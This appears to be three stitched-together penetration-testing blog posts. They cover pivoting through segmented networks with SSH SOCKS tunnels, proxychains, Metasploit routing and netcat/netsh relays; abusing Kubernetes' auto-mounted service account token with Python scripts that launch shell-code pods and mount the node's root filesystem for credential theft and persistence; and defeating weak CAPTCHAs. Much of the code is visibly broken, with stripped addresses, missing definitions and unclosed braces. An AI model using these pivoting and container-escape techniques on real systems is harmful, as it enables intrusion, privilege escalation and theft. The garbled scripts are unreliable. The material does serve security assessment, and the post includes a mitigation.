Sometimes You Just Have to Proxy Your Socks Off


Sometimes during assessments sensitive systems are significantly segmented from other networks. Therefore its very important for penetration testers to know how to proxy your socks off in order to move across network.


To gain access to other networks, whether it’s the internet or a protected subnet. We can use putty on windows and the native ssh client on Linux to preform port forwarding and create Socks proxies to bypass access controls.

Proxy Your Socks Off - Web server Post Exploitation with SSH Tunnels and Socks Proxy

Proxy Caveats

SOCKS proxies only work for TCP traffic and with applications that support using a transparent proxy. Applications that use their own proxy settings, require forward secrecy, or check session integrity likely won’t function correctly.

All ports from 1-1024 require administrative rights to allocate on both windows and Linux systems.

Port 0 is used to represent a randomly generated port number, in both windows and linux systems.

How to Proxy Your Socks Off

Proxy Traffic in Windows

In Windows simply open putty and enter the IP address you want to connect  in as the Hostname/IP address.

Proxy your socks off - configure Putty SSH connections

Next we have to tell putty that we want it to open a port on the localhost to be used to forward all traffic to our remote host. To do that, we go to the connections -> SSH -> Tunnels section, add a source port, choose the Dynamic option, and click the add button.

Proxy your socks off - configure Putty SSH for dynamic port forwarding options

At this point you can click the open button and authenticate as if it were a normal SSH connection. Just be sure to leave the terminal open once authenticated, to ensure traffic is being passed from the local port to the remote host.

To tell windows to use the socks proxy, open internet options from the control panel or the start menu search. Then go to the connections tab and open LAN Settings.

Proxy your socks off - configure Control Panel Internet Properties for Socks Proxy

Once LAN settings opens, select the “use a proxy server for your LAN” check box and click the advanced.

Proxy your socks off - configure Windows Lan Settings for Socks Proxy

In the Socks box add localhost or and the port you set as dynamic in putty. Then click OK three times to save all the settings.

Proxy your socks off - configure Windows Advanced Proxy Settings for Socks Proxy

Proxy Traffic in Linux

If you need to proxy your Kali system, the process is fairly similar. Start by using the ssh client to dynamically forward traffic from a local port. This can be done with a command similar to the following, where 9050 is our dynamic port.

ssh -NfD 9050 root@

Next we need to tell proxy chains where to send traffic from our programs. This can be set globally be using a command like the following.

echo "socks4\t127.0.0.1\t9050" >> /etc/proxychains.conf

To run an application through the socks proxy, simply prepend it with the proxychains command, like the following.

proxychains iceweasel

There is not built in means to setup a system wide socks proxy. However the BadVPN package has a package tun2socks that can tunnel all traffic over a local socks proxy.

Proxy Your Socks Off with Metasploit

Sometimes, while doing an assessment you may even want to run some tools such as nmap or even SQL Management studio (ssms.exe) over an established shell. Metasploit has a post module (auxiliary/server/socks4a) that can be used to create a socks4 proxy on an existing session.

However, to start off we need to tell metasploit how to route traffic to each of our shell’s networks before running the socks proxy. This can either be done manually with the route command or if your session is on a windows host with the autoroute module (post/windows/manage/autoroute).

To add a route manually you can use the built in route command with options similar to the following.

route add 1

To add routes with autoroute, either use the post module or run autoroute from a meterpreter shell. For the autoroute module (post/windows/manage/autoroute) just set the session ID and run. For autoroute from meterpreter use a command similar to the following.

run autoroute -s

Once routes are established within metasploit to your target networks, you can run the socks proxy module (auxiliary/server/socks4a) and note the SRVPORT.

Using Proxychains to Proxy Traffic through Metasploit Meterpreter

Next we need to tell proxychains what port to send traffic to within the global configuration file (/etc/proxychains.conf), just like in the Linux example above. There should be a line like “socks4 1080” at the bottom of the file, change the port 1080 to whatever your SRVPORT was in metasploit.

Once the configuration file is updated, proxychains can be used to issue commands through metasploit shell(s). Like with the following nmap example.

proxychains nmap -v -sS

If we want to make this socks proxy available to a windows host for programs like SQL Server Management Studio, perform a local port forward  to the socks port on the Linux system. To do this we can use putty and follow steps similar to those presented above.

Start by creating a local port forward of a local port on our windows system, to the local socks port on the Linux system with putty. Start by allocating a source port for connection on the local system and forward to a destination of; where 1080 is your metasploit SRVPORT.

Proxy your socks off - configure Putty SSH to allocate local port to connect to remote Socks Proxy

We can then just configure a system wide proxy by adding our forwarded port as the socks port, instead of using a local socks proxy.

Proxy your socks off - configure Windows Advanced Proxy Settings for forwarded Socks Proxy

Once those settings are changes, we should be able to use the majority of our tools within windows without issue.

Using SSH to Provide Remote System Internet Access via local Socks Proxy

An SSH tunnel can be used to forward traffic from your local system to a port on a remote system. This can be done in Linux by switching the -L option with -R. Or in putty by choosing the Remote option under tunnels instead of Local. For example if you wanted to share your local socks proxy with a remote system to provide internet access, putty can be used with a remote forward like the following.

Proxy your socks off - configure Putty SSH to allow remote host internet access via a remote port forward to a local socks proxy

Using Compromised Linux Webserver to Access Internal Network and Database

It’s also worth noting that SSH port forwarding can be performed on the network socket level and does not require an interactive session be established; only valid authentication is required. For instance, say you wanted to log into a restricted database of a webserver. But you only have access to the webserver account. The webserver user is not allowed to log into the server interactively by default, but that doesn’t mean it can’t authenticate. In many cases SSH can be used as described in my post on SSH for post exploitation to get around limited user shells.

Using Linux Native Tools to Proxy Your Socks Off

Tools natively built-in to windows and linux can also be used to preform port forwarding. Just note that this methodology simply makes a port to port translation and does not manipulate the traffic in any way. Netcat (nc) is found in almost every single Linux distribution and can be used to easily preform port forwarding with commands similar to the following.

First we have to make a named pipe so that any response from the server aren’t dumped to standard out.

mkfifo backpipe

Then we can use a command similar to the following to send traffic from 8080 on the localhost to a remote host on a different port utilizing the named pipe. This could help get around a firewall or help send traffic to another system to be caught by another port translation or process.

nc -l 8080 0<backpipe | nc 80 1>backpipe

Similarly the netsh (commandline windows firewall editor) command in windows can be used to create a local port forward as well. In this cause we can follow the same example and create a port translation from localhost 8080 to on port 80.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=80

Windows 7 and above will likely require administrative privileges to make changes to the windows firewall. But you can likely still utilize the windows version of nc or netcat to redirect traffic all the same.

Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing to take my Certified Kuberenetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option, automatically mounts the service account token, within each container of a given pod. This account token is meant to provide the pod the ability to interact with the Kubernetes API server. This option being enabled by default, creates a great way for attackers with access to a single container, to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specifications. This is because the service account dictates permissions and is used to run a pods processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pods namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or service account spec, then the admission controller will also add a volume mount for the service account token, to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/” within every running container by default.

Why is the AutomountServiceAccountToken bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling have utilized the service account token to communicate with Kubernetes and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but lucky almost all major programing languages already have Kubernetes client libraries. In my case, I often write in python and the python client library can handle loading a containers service account token. With that token we can utilize simple function calls like within the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/").read()

# Establish the core API object to interact with

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "while true;do python -c '<Shell code>';sleep 5; done"

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace,

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace,

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace,

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security polices to restrict the ability to mount a nodes local root filesystem. We can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the nodes root filesystem with a similar script.

from kubernetes import client, config
import time

from kubernetes import client, config
import time

# Load the containers local service account token

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/").read()

# Establish the core API object to interact with

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "while true;do python -c '<Shell code>';sleep 5; done"
					'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace,

print("Trying to deploy a new pod with our custom comand")

print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace,

You can also use the node selector and label like “” to try and get the new pod to spin up on a higher value control plane node.

With access to a pod container with the nodes root filesystem mounted, normal file and credential pillaging can take place. Also easier persistence methods can be used with write access, like adding a crontab or my recent post on leveraging controlled failure of systemd services, to gain a foot hold on the Kubernetes control plane.

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017. This issue is unlikely to be addressed until API v2 is available, because it’s currently required for backwards compatibility. That being said, this issue can still be addresses manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change to the admission controller, but that would risk issues with compatibility and break future upgrades.

Decoding Weak CAPTCHA’s

Decoding Weak CAPTCHA’s

TLDR; Weak CAPTCHA services utilized on the internet can be programmatically solved with a fairly high success rate.


A lot of firms, including mine, have begun to recommended CAPTCHA’s be used on all web forms which feed into existing business processes (registration pages, contact pages, etc). This recommendation can be a double edged sword, because there are still several CAPTCHA services that utilize weak CAPTCHA’s, which can be readily decoded with modern image analysis techniques. That being said several individuals have asked if there is a systematic way to test the strength of a given CAPTCHA, to determine weather it’s weak or not.


There are two major methodologies currently being widely used to  decode weak CAPTCHA’s. The first technique is to remove the noise from CAPTCHA images by reversing the programmatic functions, used to add visual abstractions. Then simply comparing each character to a set of known sample characters. This method relays heavily on evaluating each weak CAPTCHA service offering and creating reliable function sets to solve individual CAPTCHA’s. The best tool for using this technique to test for known weak CAPTCHA types is pwntcha.

The second methodology uses vector based image analysis to compare each pixels location to the expected location given, each possible character. After consolidating all of these pixel location checks, each possible character is ranked based on its probability of being correct.  The success of this method relays heavily on the use of a reference font, thus if the reference font and the CAPTCHA’s font are distantly different the analysis won’t go well. The best freely available tool I’ve found using this technique to test the strength of CAPTCHA’s is captcha-decoder.

How to use

Unfortunately almost every implementation of CAPTCHA’s is going to be different enough to make web scrapping a sample set of CAPTCHA images difficult. Thus the first step is always going to be downloading three to five CAPTCHA images for testing.

Then we can run each image through pwntcha and see if it can identify the image as a known weak CAPTCHA type.

Pwntcha <img>

Test run using Paypal’s known weak CAPTCHA samples 100/100

Test run of vBullentin’s known weak CAPTCHA samples 100/100

Last we can run captcha-decoder on each of the sample images to try and get an idea if vector based analysis is going to be successful.  You will have to use your best judgment once you receive the results to determine if the risk is high enough to create an issue. Generally if all the correct letters are guessed with over 70% confidence the CAPTCHA should be considered weak. However an organization may believe 70% is too high and may only have a much lower tolerance.

decaptcha <img or img url> –min 0 –max 20 –limit 5 –channels 5 –tolerance 7

Current font test image on mondor (a public API and web resource site)

So here in this case the variable boldness of the letters tricked the vector analysis into thinking the K was an X and the L was an I.


Pwntcha known compiling issues
Note: if you have an issue with bootstrap, edit the bootstrap file to include automake version 13 and 14.
Captcha-decoder –
Note: if you have an issue with installing, make sure the python-dev system package is installed.